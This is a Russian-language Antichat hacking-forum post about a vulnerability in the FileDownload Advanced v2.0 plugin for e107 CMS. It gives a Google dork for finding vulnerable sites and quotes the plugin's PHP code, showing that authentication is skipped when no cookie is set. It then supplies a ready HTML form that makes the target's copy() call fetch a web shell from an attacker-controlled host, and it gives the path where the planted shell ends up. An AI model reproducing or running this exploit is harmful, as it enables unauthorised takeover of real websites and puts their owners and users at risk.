ANTICHAT - Показать сообщение отдельно - [ Обзор уязвимостей e107 cms ]

FileDownload Advanced v2.0 by The Hunter
скачать

гугл- inurl:e107_plugins/FileDownload

http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php

PHP код:

require_once("config.php"); require_once("functions.php"); if ($_GET["dir"]) $dir = $_GET["dir"]; else $dir = $_POST["dir"]; if ($_POST["numfiles"]) $numfiles = $_POST["numfiles"]; else $numfiles = 4; if ((isset($_POST["hide"])) and (isset($dir))) { for ($x = 1; $_POST["file".$x]; $x++) { $file = $_POST["file".$x]; $copy = copy($file,$dir."/".getFileName($file)); $upload_ok .= "<tr><td style='width:100%' colspan=8 class='header2'>Uploaded:" . getFileName($file) . " successfully.</td></tr>"; } }

./config.php

PHP код:

//$expPrefPass=''; $expBaseDir='../'; $expSortOrder=0; $expDisplaySearch... Как видно первая строка закоментирована. ...

./functions

PHP код:

require_once("config.php"); if (isset($_COOKIE["phpFileDownload_login"])) if ($_COOKIE["phpFileDownload_login"] != $expPrefPass) header ("location: login.php");... И посему нет никакой переадресации если куки не устанавливать. ): ...function getFileName ($file) { $strlen = strlen($file); $retfile = ""; while ($strlen > 0) { $_g = substr(substr($file, $strlen, strlen($file)), 0, 1); if (($_g == "\\") or ($_g == "/")) break; $retfile = substr($file, $strlen, strlen($file)); $strlen = $strlen-1; } return $retfile; }...

Результат:

Цитата:

Функция copy
Замечание: Начиная с PHP версии 4.3.0, оба параметра, source и dest, могут быть URL'ами, если были включены "упаковщики fopen"

Заливаем на хостинг шелл или с своего розшареного.

Посылаем запрос:
<form action="http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php" method=post>
<input type=hidden name=hide value=0><br>
<input type=text name="file1" value='http://[host2]/[path]/shell.php'><br>
<input type=text name=dir value=log><br>
<input type=submit>
</form>

Наш шелл:
http://[host]/[path]/FileDownload/filedownload/log/shell.php

ps др. способы заливки